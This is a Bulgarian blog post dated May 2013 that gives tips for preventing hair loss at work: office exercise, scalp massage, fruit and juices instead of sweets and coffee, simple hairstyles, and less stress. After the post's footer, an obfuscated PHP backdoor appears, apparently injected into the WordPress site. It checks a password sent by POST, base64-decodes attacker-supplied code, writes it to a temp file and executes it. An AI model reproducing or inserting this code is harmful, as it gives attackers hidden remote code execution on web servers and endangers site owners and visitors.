Грижи за косата на работното място | Косопад

Как да се грижим за косата по време на работа

Работното място често създава предпоставки за косопад

косопад и работа

Превенция на косопад чрез намаляване на стреса

Малко от нас се замислят, че на работното място съвсем спокойно могат да полагат грижи за косата си и по този начин да си помогнат в борбата срещу косопад. Предлагаме ви няколко методики, които са подходящи преди всичко за хора работещи на едно място и в затворени пространства като офиси, магазини, заводи и др.

Гимнастика в офиса срещу косопад

В паузите между задачите не стойте на едно място и спрете да се взирате в компютъра, стоката или машината на която се трудите. Станете, разходете се малко, ако имате възможност направете няколко клякания или лицеви опори. Това ще помогне за засилване на кръвообращението и съответно ще доведе до по – добро оросяване на крайниците.

Масаж на скалпа срещу косопад

Да масажирате главата си е най – малкото лесна и приятна задача. Когато се сетите, просто внимателно започнете да движите върховете на пръстите върху скалпа, докато усетите приятно затопляне. Това е полезно за по – добър приток на кръв към космените фоликули и доставяне на повече хранителни вещества към тези зони.

Плодове, натурални сокове и витамини

Забранете си безумното тъпкане със сладки или мазни храни в почивката, както и пиенето на огромни количества кафе и нискокачествени газирани напитки. Заменете тези продукти със свежи плодове, натурални сокове или билков чай с мед. Отдавна знаем, че храненето е едно от нещата, отговорни за цялостното състояние на косата и появата на косопад.

Бъдете естествени

На работа бъдете естествени и не измъчвайте косата си със сложни прически или използване на тонове помади. Разберете, че доброто отношение към колегите и клиентите ще направи в пъти повече за създаване на сплотен колектив, отколкото всякакви тоалети и гримове.

Намалете стреса на работното място

Стресът е сред основните причинители на косопад в съвременното общество. Работата е мястото, където ежедневно сме изложени на неприятности, но нека това да не ни обезсърчава. Просто променете нагласата и намалете стреса. Не е задължително да приемате всичко на лична основа, независимо дали става въпрос за неприятно отношение на началството или разправии с досадни колеги и клиенти.

19. май 2013 12:21:36 от Косопад
Категории: Любопитно за косопада | Етикети: , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}